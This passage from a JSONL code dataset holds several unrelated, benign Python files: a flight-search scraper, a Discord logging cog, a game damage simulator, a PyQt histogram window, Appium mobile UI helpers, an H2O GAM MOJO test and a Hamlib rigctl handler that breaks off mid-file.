RuntimeError('Can\\'t parse flight direction from the table\\'s title')\n\n # Parse details\n details = html_element.xpath('div[@class=\\'vacancy_route\\']/text()')[0]\n # details string example: 'Berlin (BER) – London (LON), Thursday, 27/10/16'\n parsed_data = parse.parse('{0} ({1}) – {2} ({3}),  {4}, {5}', details.strip())\n result['city_from'] = parsed_data[0]\n result['iata_from'] = parsed_data[1]\n result['city_to'] = parsed_data[2]\n result['iata_to'] = parsed_data[3]\n result['date'] = datetime.datetime.strptime(parsed_data[5], '%d/%m/%y').date()\n\n return result\n\n @staticmethod\n def _verify_search_results(search_reply, from_iata, to_iata, outbound_date, return_date=None):\n result = True\n\n if len(search_reply) == 0:\n # We just have no results. It's OK.\n return True\n\n if search_reply['outbound_flights_details']['direction'] != 'outbound':\n result = False\n if search_reply['outbound_flights_details']['iata_from'] != from_iata:\n result = False\n if search_reply['outbound_flights_details']['iata_to'] != to_iata:\n result = False\n if search_reply['outbound_flights_details']['date'] != outbound_date:\n result = False\n\n if return_date is None:\n if 'return_flight_details' in search_reply:\n # we were performing a one-way search and should not have any return flights\n result = False\n else:\n if search_reply['return_flights_details']['direction'] != 'return':\n result = False\n if search_reply['return_flights_details']['iata_from'] != to_iata:\n result = False\n if search_reply['return_flights_details']['iata_to'] != from_iata:\n result = False\n if search_reply['return_flights_details']['date'] != return_date:\n result = False\n\n return result\n\n @staticmethod\n def _print_flights(flights):\n for direction in (\n {'key': 'outbound_flights', 'name': 'Outbound flight'},\n {'key': 'return_flights', 'name': 'Return flight'}\n ):\n if direction['key'] in flights:\n for flight in flights[direction['key']]['flights']:\n print('{0}:'.format(direction['name']))\n\n # Print information about start and end times\n end_days_text = ''\n if flight['end_time_days'] == 1:\n end_days_text = ' +1 day'\n elif flight['end_time_days'] > 1:\n end_days_text = ' +' + str(flight['end_time_days']) + ' days'\n\n print('\\tStarts at {0} , ends at {1}{2}'.format(\n flight['start_time'].strftime('%H:%M'),\n flight['end_time'].strftime('%H:%M'),\n end_days_text\n ))\n\n # Print information about duration\n print('\\tDuration: {0}'.format(flight['duration']))\n\n # Print the information about prices\n print('\\tFare options:')\n for price in flight['prices']:\n print('\\t\\t{0:<17}: {1}{2}'.format(\n price['name'],\n price['currency'],\n price['value']\n ))\n","sub_path":"src/flights_search.py","file_name":"flights_search.py","file_ext":"py","file_size_in_byte":21949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"605105220","text":"import discord\nimport importlib\nimport modules.logging\nfrom discord.ext import commands\n\n\nclass LogCog(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.active = True\n modules.logging.init(self)\n\n def unload(self):\n importlib.reload(modules.logging)\n\n @commands.command(aliases=[\"log\", \"turn_on\", \"log_on\"])\n @commands.is_owner()\n async def toggle(self, ctx):\n self.active = True\n await ctx.send(\"Logging on\")\n\n @commands.command(aliases=[\"nolog\", \"turn_off\", \"log_off\"])\n @commands.is_owner()\n async def untoggle(self, ctx):\n self.active = False\n await ctx.send(\"Logging 
off\")\n\n async def log(self, log_type, message, datetime):\n if not self.active:\n return\n\n log_channel_id = 586519122037178380#584134598087278632\n log_channel = self.bot.get_channel(log_channel_id)\n content = None\n\n if log_type is modules.logging.LogType.ERROR:\n title = \"ERROR\"\n elif log_type is modules.logging.LogType.SUCCESS:\n title = \"SUCCESS\"\n elif log_type is modules.logging.LogType.URGENT:\n title = \"URGENT\"\n content = \"<@&583265861201297411>\"\n else:\n title = \"EVENT\"\n\n embed = discord.Embed(description=message, color=log_type.value, timestamp=datetime)\n embed.set_author(name=title)\n await log_channel.send(content, embed=embed)\n \n\n\n\ndef setup(bot):\n bot.add_cog(LogCog(bot))\n\n","sub_path":"cogs/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"252802159","text":"def sum(*args):\n \"\"\"计算n个数的和\"\"\"\n sum = 0\n for i in args:\n sum += i\n return sum\n\n\ndef multiply(*args):\n \"\"\"计算n个数相乘\"\"\"\n result = args[0]\n for i in args[1:]:\n result *= i\n return result\n\n\nif __name__ == \"__main__\":\n\n print(\"1+2+..+10的和是:\", sum(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))\n print(\"1*2*..*10的结果是:\", multiply(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))\n","sub_path":"pers/cyj/day10/mudule/calc/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"236364779","text":"from core.unit import Char\nfrom core.action import Action, Ability\nfrom core.scaling import ratio_type\nfrom core.read_data import buff_dict\nfrom core.artifact import Artifact\nimport copy\n\n\nclass Ningguang(Char):\n def __init__(self, level, constellation, weapon, weapon_rank, artifact, talent_levels):\n super().__init__(\"Ningguang\", level, constellation, weapon, weapon_rank, artifact, talent_levels)\n self.jade_stacks = 0\n self.jade_wall = False\n\n def ningguang_normal(self, _, __, ___):\n if self.jade_stacks < 3:\n self.jade_stacks += 1\n\n def ningguang_charged(self, _, sim, action):\n if self.jade_stacks > 0:\n jade_proc = JadeStar(self, self.jade_stacks)\n jade_proc.add_to_damage_queue(sim)\n self.jade_stacks = 0\n\n def ningguang_a2(self, _, __):\n if self.jade_stacks > 0:\n self.live_charged_stamina_cost = [0]\n\n def ningguang_e(self, _, sim, __):\n self.jade_wall = True\n\n for unit in sim.units:\n unit.triggerable_buffs[\"Ningguang_A4_Trigger\"] = copy.copy(buff_dict[\"Ningguang_A4_Trigger\"])\n unit.triggerable_buffs[\"Ningguang_A4_Trigger\"].time_remaining = 30\n unit.triggerable_buffs[\"Ningguang_A4_Trigger\"].source = self\n\n def ningguang_a4_trigger(self, unit_obj, sim, __):\n if unit_obj == sim.chosen_unit:\n unit_obj.active_buffs[\"Ningguang_A4_Buff\"] = copy.copy(buff_dict[\"Ningguang_A4_Buff\"])\n unit_obj.active_buffs[\"Ningguang_A4_Buff\"].source = self\n\n @staticmethod\n def ningguang_a4_buff(unit_obj, _):\n unit_obj.live_geo_dmg += 0.1\n\n def ningguang_q(self, _, sim, __):\n if self.jade_wall:\n\n self.jade_wall = False\n\n for unit in sim.units:\n del unit.triggerable_buffs[\"Ningguang_A4_Trigger\"]\n\n jade_stars_burst = Ability(self, \"burst\")\n jade_stars_burst.add_to_damage_queue(sim)\n\n if self.constellation >= 2:\n self.live_skill_cd = 0\n\n if self.constellation >= 6:\n self.jade_stacks = 7\n\n\nclass JadeStar(Action):\n def __init__(self, unit_obj, jade_stacks):\n super().__init__(unit_obj)\n self.action_type 
= \"damage\"\n self.ticks = jade_stacks\n self.tick_times = [0.25] * jade_stacks\n self.tick_damage = [0.496] * jade_stacks\n self.tick_scaling = [ratio_type(unit_obj, \"charged\")[unit_obj.normal_level]] * jade_stacks\n self.tick_types = [\"charged\"] * jade_stacks\n self.tick_units = [0] * jade_stacks\n self.tick_element = [\"Geo\"] * jade_stacks\n self.particles = 0\n self.tick_used = [\"no\"] * jade_stacks\n\n\nNingguangArtifact = Artifact(\"Archaic Petra\", \"pct_atk\", \"geo_dmg\", \"crit_rate\", 30)\n\nNingguangF2P = Ningguang(90, 0, \"Mappa Marre\", 1, NingguangArtifact, [6, 6, 6])\n\n\ndef main():\n print(NingguangTest.live_base_atk)\n print(NingguangTest.static_buffs)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"characters/Ningguang.py","file_name":"Ningguang.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"267294964","text":"from . import *\nfrom telethon import events\n\nchat = 1202167338\n\n@asst.on(events.NewMessage(pattern=\"\\\\/search@Siddharth_Otaku_bot ?(.*)\"))\nasync def _(e):\n key = e.pattern_match.group(1)\n txt = \"\"\n async for x in bot.iter_messages(chat, search=key, reverse=True):\n txt += f\"https://t.me/animax_industry/{x.id}\\n\"\n if txt:\n await e.reply(txt, link_preview=False,)\n","sub_path":"oceansearch.py","file_name":"oceansearch.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"377844002","text":"from PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtGui import QFont, QDoubleValidator\n\nimport numpy as np\n\nfrom matplotlibcanvases import SingleMplCanvas\n\nclass WindowHistogram2DFrequency(QtWidgets.QWidget):\n def __init__(self) -> None:\n super().__init__()\n\n self.setWindowTitle(\"Quick Graphing - 2D Frequency Histogram\")\n\n self.data_x = []\n self.data_y = []\n\n font_times_12 = QFont(\"Times New Roman\", 12)\n font_times_14 = QFont(\"Times New Roman\", 14)\n font_times_16 = QFont(\"Times New Roman\", 16)\n font_times_16_underline = QFont(\"Times New Roman\", 16)\n font_times_16_underline.setUnderline(True)\n\n layout_main = QtWidgets.QVBoxLayout(self)\n\n layout_top = QtWidgets.QHBoxLayout()\n\n layout_plot_titles = QtWidgets.QVBoxLayout()\n\n label_plot_title = QtWidgets.QLabel()\n label_plot_title.setText(\"Title:\")\n label_plot_title.setFont(font_times_14)\n\n label_plot_xlabel = QtWidgets.QLabel()\n label_plot_xlabel.setText(\"x-axis Label:\")\n label_plot_xlabel.setFont(font_times_14)\n\n label_plot_ylabel = QtWidgets.QLabel()\n label_plot_ylabel.setText(\"y-axis Label:\")\n label_plot_ylabel.setFont(font_times_14)\n\n layout_plot_titles.addWidget(label_plot_title)\n layout_plot_titles.addWidget(label_plot_xlabel)\n layout_plot_titles.addWidget(label_plot_ylabel)\n\n layout_plot_values = QtWidgets.QVBoxLayout()\n\n self.line_edit_plot_title = QtWidgets.QLineEdit()\n self.line_edit_plot_title.setText(\"General Histogram\")\n self.line_edit_plot_title.setFont(font_times_14)\n self.line_edit_plot_title.editingFinished.connect(self.on_finished_editing_line_edit_plot_title)\n\n self.line_edit_plot_xlabel = QtWidgets.QLineEdit()\n self.line_edit_plot_xlabel.setText(\"x-values\")\n self.line_edit_plot_xlabel.setFont(font_times_14)\n self.line_edit_plot_xlabel.editingFinished.connect(self.on_finished_editing_line_edit_plot_xlabel)\n\n self.line_edit_plot_ylabel = QtWidgets.QLineEdit()\n self.line_edit_plot_ylabel.setText(\"y-values\")\n 
self.line_edit_plot_ylabel.setFont(font_times_14)\n self.line_edit_plot_ylabel.editingFinished.connect(self.on_finished_editing_line_edit_plot_ylabel)\n\n layout_plot_values.addWidget(self.line_edit_plot_title)\n layout_plot_values.addWidget(self.line_edit_plot_xlabel)\n layout_plot_values.addWidget(self.line_edit_plot_ylabel)\n\n layout_top.addLayout(layout_plot_titles)\n layout_top.addLayout(layout_plot_values)\n\n layout_bottom = QtWidgets.QHBoxLayout()\n\n self.canvas_plot = SingleMplCanvas(self, width=5, height=5, dpi=100)\n\n layout_right_side_bar = QtWidgets.QVBoxLayout()\n\n label_points_title = QtWidgets.QLabel()\n label_points_title.setText(\"Points\")\n label_points_title.setFont(font_times_16_underline)\n\n self.list_widget_points = QtWidgets.QListWidget()\n self.list_widget_points.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\n self.list_widget_points.setFont(font_times_12)\n\n button_remove_point = QtWidgets.QPushButton()\n button_remove_point.setText(\"Remove Selected Points\")\n button_remove_point.setFont(font_times_14)\n button_remove_point.clicked.connect(self.on_click_remove_point)\n\n layout_line_edit_x = QtWidgets.QHBoxLayout()\n\n label_line_edit_x = QtWidgets.QLabel()\n label_line_edit_x.setText(\"x:\")\n label_line_edit_x.setFont(font_times_16)\n\n self.line_edit_x = QtWidgets.QLineEdit()\n self.line_edit_x.setValidator(QDoubleValidator())\n self.line_edit_x.setFont(font_times_16)\n\n layout_line_edit_x.addWidget(label_line_edit_x)\n layout_line_edit_x.addWidget(self.line_edit_x)\n \n layout_line_edit_y = QtWidgets.QHBoxLayout()\n\n label_line_edit_y = QtWidgets.QLabel()\n label_line_edit_y.setText(\"y:\")\n label_line_edit_y.setFont(font_times_16)\n\n self.line_edit_y = QtWidgets.QLineEdit()\n self.line_edit_y.setValidator(QDoubleValidator())\n self.line_edit_y.setFont(font_times_16)\n\n button_add_point = QtWidgets.QPushButton()\n button_add_point.setText(\"Add Point\")\n button_add_point.setFont(font_times_14)\n button_add_point.clicked.connect(self.on_click_button_add_point)\n\n layout_line_edit_y.addWidget(label_line_edit_y)\n layout_line_edit_y.addWidget(self.line_edit_y)\n\n layout_right_side_bar.addWidget(label_points_title)\n layout_right_side_bar.addWidget(self.list_widget_points)\n layout_right_side_bar.addWidget(button_remove_point)\n layout_right_side_bar.addLayout(layout_line_edit_x)\n layout_right_side_bar.addLayout(layout_line_edit_y)\n layout_right_side_bar.addWidget(button_add_point)\n\n layout_bottom.addWidget(self.canvas_plot, 5)\n layout_bottom.addLayout(layout_right_side_bar, 1)\n\n layout_main.addLayout(layout_top, 1)\n layout_main.addLayout(layout_bottom, 5)\n\n self.update_plots()\n self.update_list()\n\n def update_plots(self) -> None:\n self.canvas_plot.axes.clear()\n\n self.canvas_plot.axes.set_title(self.line_edit_plot_title.text())\n self.canvas_plot.axes.set_xlabel(self.line_edit_plot_xlabel.text())\n self.canvas_plot.axes.set_ylabel(self.line_edit_plot_ylabel.text())\n\n self.canvas_plot.axes.hist2d(self.data_x, self.data_y)\n \n self.canvas_plot.draw()\n \n def update_list(self) -> None:\n self.list_widget_points.clear()\n for index, item in enumerate(np.column_stack((self.data_x, self.data_y))):\n self.list_widget_points.insertItem(index, np.array2string(item, separator=\",\"))\n\n def on_click_remove_point(self) -> None:\n indices_to_delete = []\n for item in self.list_widget_points.selectedIndexes():\n indices_to_delete.append(item.row())\n indices_to_delete.sort(reverse=True)\n for index in indices_to_delete:\n 
del self.data_x[index]\n            del self.data_y[index]\n\n        self.update_plots()\n        self.update_list()\n\n    def on_click_button_add_point(self) -> None:\n        self.data_x.append(float(self.line_edit_x.text()))\n        self.data_y.append(float(self.line_edit_y.text()))\n\n        self.update_plots()\n        self.update_list()\n\n    def on_finished_editing_line_edit_plot_title(self) -> None:\n        self.update_plots()\n\n    def on_finished_editing_line_edit_plot_xlabel(self) -> None:\n        self.update_plots()\n\n    def on_finished_editing_line_edit_plot_ylabel(self) -> None:\n        self.update_plots()\n","sub_path":"windowsimpleplots/window_histogram_2d_frequency.py","file_name":"window_histogram_2d_frequency.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"266640056","text":"from .app import FastApiApp, FlaskApp\nimport sys\n\n\nclass BaseComand:\n    def __init__(self, app, folder_name, db_driver, db_name, testdb_name, git_repo):\n        self.app = app\n        self.folder_name = folder_name\n        self.db_driver = db_driver\n        self.db_name = db_name\n        self.testdb_name = testdb_name\n        self.git_repo = git_repo\n\n    def start(self):\n        if self.app == \"fastapi\":\n\n            app = FastApiApp(self.app, self.folder_name, self.db_driver, self.db_name,self.git_repo)\n            app.start()\n\n        elif self.app == \"flask\":\n\n            app = FlaskApp(self.app, self.folder_name, self.db_driver, self.db_name, self.testdb_name, self.git_repo)\n            app.start()\n","sub_path":"takeaway/controllers/management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"222848324","text":"# -*- coding:UTF-8 -*-\n'''\nCreated on 2016-8-15\n\n@author: N-254\n'''\nfrom Mobile import MobileUtil\nfrom COMMON import Log\nfrom CONFIG.Define import LogLevel\nfrom Mobile.Define.Clue import OthersObjectDef\nimport copy\n\n'''\n @function: area selection\n @para: \n @return: returns True if the click succeeds; otherwise returns False\n @ hongzenghui 2016-8-15\n'''\ndef area_select():\n    xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/left_text']\"\n    if MobileUtil.click_element_by_xpath(xpath) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Area selection clicked successfully\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Failed to click area selection\")\n        return False\n    \n'''\n @function: click the inbox\n @para: \n @return: returns True if the click succeeds; otherwise returns False\n @ hongzenghui 2016-8-15\n'''\ndef click_unread_message():\n    xpath = \"//android.widget.LinearLayout[@resource-id='com.tianque.linkage:id/rl_right']\"\n    if MobileUtil.click_element_by_xpath(xpath) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Unread messages clicked successfully\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Failed to click unread messages\")\n        return False\n    \n'''\n @function: click carousel info\n @para: \n @return: returns True if the click succeeds; otherwise returns False\n @ hongzenghui 2016-8-15\n'''\ndef click_lunbo_info(text=None):\n    xpath = \"//android.widget.TextView[@text='%s']\" % text\n    if MobileUtil.click_element_by_xpath(xpath) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Clicked carousel content successfully\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Failed to click carousel content\")\n        return False\n    \n'''\n @function: click the tip-off square ('爆料广场')\n @para: \n @return: returns True if the click succeeds; otherwise returns False\n @ hongzenghui 2016-8-15\n''' \ndef click_baoliao_square():\n    xpath = \"//android.widget.TextView[@text='爆料广场']\"\n    if MobileUtil.click_element_by_xpath(xpath) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Clicked the tip-off square successfully\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Failed to click the tip-off square\")\n        return False\n    \n'''\n @function: get tip-off statistics\n @para: \n @return: returns a tip-off statistics object containing today's new count, this week's completed count, and the province-wide completed count for this week\n @ hongzenghui 2016-8-15\n''' \ndef get_baoliao_count():\n    xpath1 = \"//android.widget.TextView[@text='今日新增']/following-sibling::android.widget.TextView[1]\"\n    xpath2 = \"//android.widget.TextView[@text='本周办结']/following-sibling::android.widget.TextView[1]\"\n    xpath3 = \"//android.widget.TextView[@text='全省本周办结']/following-sibling::android.widget.TextView[1]\"\n    baoliaoCountObject = copy.deepcopy(OthersObjectDef.baoliaoCount) \n    baoliaoCountObject['todayAdd'] = MobileUtil.find_element_by_xpath(xpath1).text\n    baoliaoCountObject['weekComplete'] = MobileUtil.find_element_by_xpath(xpath2).text\n    baoliaoCountObject['allProviceWeekComplete'] = MobileUtil.find_element_by_xpath(xpath3).text\n    Log.LogOutput(LogLevel.DEBUG, message=\"Today's new count: %s, completed this week: %s, province-wide completed this week: %s\" % (baoliaoCountObject['todayAdd'],baoliaoCountObject['weekComplete'],baoliaoCountObject['allProviceWeekComplete']))\n    return baoliaoCountObject\n\n'''\n @function: click Shuoshuo (posts)\n @para: \n @return: returns True if the click succeeds; otherwise returns False\n @ hongzenghui 2016-8-15\n''' \ndef click_shuoshuo():\n    xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/module_topic']\"\n    if MobileUtil.click_element_by_xpath(xpath) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Clicked Shuoshuo successfully\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Failed to click Shuoshuo\")\n        return False\n    \n'''\n @function: click safety propaganda\n @para: \n @return: returns True if the click succeeds; otherwise returns False\n @ hongzenghui 2016-8-15\n''' \ndef click_safe_propaganda():\n    xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/module_propaganda']\"\n    if MobileUtil.click_element_by_xpath(xpath) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Clicked safety propaganda successfully\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Failed to click safety propaganda\")\n        return False\n    \n'''\n @function: click convenience services\n @para: \n @return: returns True if the click succeeds; otherwise returns False\n @ hongzenghui 2016-8-15\n''' \ndef click_bianmin_service():\n    xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/module_service']\"\n    if MobileUtil.click_element_by_xpath(xpath) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Clicked convenience services successfully\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Failed to click convenience services\")\n        return False\n    \n'''\n @function: click my tip-offs\n @para: \n @return: returns True if the click succeeds; otherwise returns False\n @ hongzenghui 2016-8-15\n''' \ndef click_my_clue():\n    xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/module_my_clue']\"\n    if MobileUtil.click_element_by_xpath(xpath) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Clicked my tip-offs successfully\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Failed to click my tip-offs\")\n        return False\n    \n'''\n @function: click the home page menu\n @para: \n @return: returns True if the click succeeds; otherwise returns False\n @ hongzenghui 2016-8-15\n''' \ndef click_firstpage_menu():\n    xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/tab_main']\"\n    if MobileUtil.click_element_by_xpath(xpath) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Clicked the home page menu successfully\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Failed to click the home page menu\")\n        return False\n    \n'''\n @function: click the square menu\n @para: \n @return: returns True if the click succeeds; otherwise returns False\n @ hongzenghui 2016-8-15\n''' \ndef click_square_menu():\n    xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/tab_information']\"\n    if MobileUtil.click_element_by_xpath(xpath) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Clicked the square menu successfully\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Failed to click the square menu\")\n        return False\n    \n'''\n @function: click the tip-off button\n @para: \n @return: returns True if the click succeeds; otherwise returns False\n @ hongzenghui 2016-8-15\n''' \ndef click_add_clue_menu():\n    xpath = \"//android.widget.ImageView[@resource-id='com.tianque.linkage:id/edit_information']\"\n    if MobileUtil.click_element_by_xpath(xpath) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Clicked the tip-off button successfully\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Failed to click the tip-off button\")\n        return False\n    \n'''\n @function: click the notice menu\n @para: \n @return: returns True if the click succeeds; otherwise returns False\n @ hongzenghui 2016-8-15\n''' \ndef click_notice_menu():\n    xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/tab_notice']\"\n    if MobileUtil.click_element_by_xpath(xpath) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Clicked the notice menu successfully\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Failed to click the notice menu\")\n        return False\n    \n'''\n @function: click the personal menu\n @para: \n @return: returns True if the click succeeds; otherwise returns False\n @ hongzenghui 2016-8-15\n''' \ndef click_personal_menu():\n    xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/tab_personal']\"\n    if MobileUtil.click_element_by_xpath(xpath) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Clicked the personal menu successfully\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Failed to click the personal menu\")\n        return False\n    \n'''\n @function: check whether we are on the main page\n @para: \n @return: returns True if on the main page; otherwise returns False\n @ hongzenghui 2016-9-21\n''' \ndef check_in_main_page():\n    xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/module_propaganda']\"\n    if MobileUtil.wait_element_by_xpath(xpath,20) is True:\n        Log.LogOutput(LogLevel.DEBUG, message=\"Currently on the main page\")\n        return True\n    else:\n        Log.LogOutput(LogLevel.ERROR, message=\"Not currently on the main page\")\n        return False","sub_path":"testAPI/Web_Test/Mobile/UI/Clue/MainPageUI.py","file_name":"MainPageUI.py","file_ext":"py","file_size_in_byte":8577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"577667337","text":"import sys, os\nsys.path.insert(1, \"../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom random import randint\nimport tempfile\n\n\ndef gam_gaussian_mojo():\n    h2o.remove_all()\n    NTESTROWS = 200 # number of test dataset rows\n    PROBLEM=\"gaussian\"\n    params = set_params()\n    df = pyunit_utils.random_dataset(PROBLEM, seed=2, missing_fraction=0.5)\n    dfnames = df.names\n\n    # add GAM specific parameters\n    params[\"gam_columns\"] = []\n    params[\"scale\"] = []\n    count = 0\n    num_gam_cols = 3 # maximum number of gam columns\n    for cname in dfnames:\n        if not(cname == 'response') and (str(df.type(cname)) == \"real\"):\n            params[\"gam_columns\"].append(cname)\n            params[\"scale\"].append(0.001)\n            count = count+1\n            if count >= num_gam_cols:\n                break\n\n    train = df[NTESTROWS:, :]\n    test = df[:NTESTROWS, :]\n    exclude_list = {\"response\", params[\"gam_columns\"][0]}\n    x = list(set(df.names) - exclude_list)\n\n    TMPDIR = tempfile.mkdtemp()\n    gamGaussianModel = pyunit_utils.build_save_model_generic(params, x, train, \"response\", \"gam\", TMPDIR) # build and save mojo model\n    MOJONAME = pyunit_utils.getMojoName(gamGaussianModel._id)\n    h2o.download_csv(test, os.path.join(TMPDIR, 'in.csv')) # save test file, h2o predict/mojo use same file\n    pred_h2o, pred_mojo = pyunit_utils.mojo_predict(gamGaussianModel, TMPDIR, MOJONAME) # load model and perform predict\n    h2o.download_csv(pred_h2o, os.path.join(TMPDIR, \"h2oPred.csv\"))\n    print(\"Comparing mojo predict and h2o predict...\")\n    pyunit_utils.compare_frames_local(pred_h2o, pred_mojo, 1, tol=1e-10)\n\n\ndef set_params():\n    missingValues = ['MeanImputation']\n    missing_values = missingValues[randint(0, len(missingValues)-1)]\n\n    params = {'missing_values_handling': 
missing_values, 'family':\"gaussian\"}\n print(params)\n return params\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(gam_gaussian_mojo)\nelse:\n gam_gaussian_mojo()\n","sub_path":"h2o-py/tests/testdir_javapredict/pyunit_PUBDEV_7185_GAM_mojo_gaussian.py","file_name":"pyunit_PUBDEV_7185_GAM_mojo_gaussian.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"312991341","text":"import logging\nimport SocketServer\nimport math\nimport time\nfrom rci import client\nimport hamlib_constants\nfrom hamlib_constants import *\n\nclass RigctlHandler(SocketServer.StreamRequestHandler):\n def handle(self):\n while True:\n cmd = self.rfile.readline().strip()\n args = []\n if len(cmd) == 0:\n continue\n send_rprt = True\n # Two forms of command: single character, or \"+\\\" followed by command name.\n # For single-character commands, the command must either generate output or a RPRT line.\n # For +\\ extended commands, the command should always output an RPRT line.\n if len(cmd) > 1 and cmd[0] == \"\\\\\":\n parts = cmd.split(\" \")\n cmd = parts[0][1:]\n if len(parts) > 1:\n args = parts[1:]\n send_rprt = False\n elif len(cmd) > 2 and cmd[0:2] == \"+\\\\\":\n parts = cmd.split(\" \")\n cmd = parts[0][2:]\n if len(parts) > 1:\n args = parts[1:]\n self.wfile.write(\"%s:\\n\" % cmd)\n else:\n # Space after command is optional.\n if len(cmd) > 1:\n args = cmd[1:].lstrip(' ').split(' ')\n cmd = cmd[0]\n send_rprt = False\n logging.info(\"command: %s args: %s\", cmd, args)\n rprt = -1\n if cmd == \"dump_state\":\n self.wfile.write(\"0\\n\") # Protocol version\n self.wfile.write(\"1\\n\") # Rig model\n self.wfile.write(\"2\\n\") # ITU region\n FREQ_RANGE_FMT = \"%(startf)lf %(endf)lf %(modes)lx %(low_power)d %(high_power)d %(vfo)x %(ant)x\\n\"\n # RX Freq ranges\n # startf endf modes low_power high_power vfo ant\n # %lf %lf %llx %d %d %x %x\n self.wfile.write(FREQ_RANGE_FMT % {\n 'startf': 1280e6,\n 'endf': 1300e6,\n 'modes': RIG_MODE_USB,\n 'low_power': -1,\n 'high_power': -1,\n 'vfo': RIG_VFO_A, # VFOA only\n 'ant': RIG_ANT_1, # Antenna 1 only\n })\n self.wfile.write(\"0 0 0 0 0 0 0\\n\") # End of RX freq range list\n # TX Freq ranges\n self.wfile.write(FREQ_RANGE_FMT % {\n 'startf': 1280e6,\n 'endf': 1300e6,\n 'modes': RIG_MODE_USB,\n 'low_power': 1,\n 'high_power': 100000,\n 'vfo': RIG_VFO_A, # VFOA only\n 'ant': RIG_ANT_1, # Antenna 1 only\n })\n self.wfile.write(\"0 0 0 0 0 0 0\\n\") # End of TX freq range list\n # Tuning step size\n self.wfile.write(\"%lx %ld\\n\" % (RIG_MODE_USB, 1)) # USB allows 1 Hz tuning\n self.wfile.write(\"0 0\\n\") # End of tuning step list\n # Filter list\n self.wfile.write(\"0 0\\n\") # End of filter list\n self.wfile.write(\"0\\n\") # max RIT\n self.wfile.write(\"0\\n\") # max XIT\n self.wfile.write(\"0\\n\") # max ifshift\n self.wfile.write(\"0\\n\") # announces\n self.wfile.write(\"10 20 30 40 50 60 70 0 \\n\") # Preamp gains list\n self.wfile.write(\"0 \\n\") # Attenuator losses list\n get_levels = RIG_LEVEL_PREAMP|RIG_LEVEL_AF|RIG_LEVEL_MICGAIN\n if self.server.has_level_strength():\n get_levels |= RIG_LEVEL_STRENGTH\n for value in (\n RIG_FUNC_NONE, # has_get_func\n RIG_FUNC_NONE, # has_set_func\n get_levels, # has_get_level\n RIG_LEVEL_PREAMP|RIG_LEVEL_AF|RIG_LEVEL_MICGAIN, # has_set_level\n RIG_PARM_NONE, # has_get_parm\n RIG_PARM_NONE, # has_set_parm\n ):\n self.wfile.write(\"0x%x\\n\" % value)\n # TODO: Support RIG_LEVEL_RF (float 0-1)\n rprt = 0\n elif 
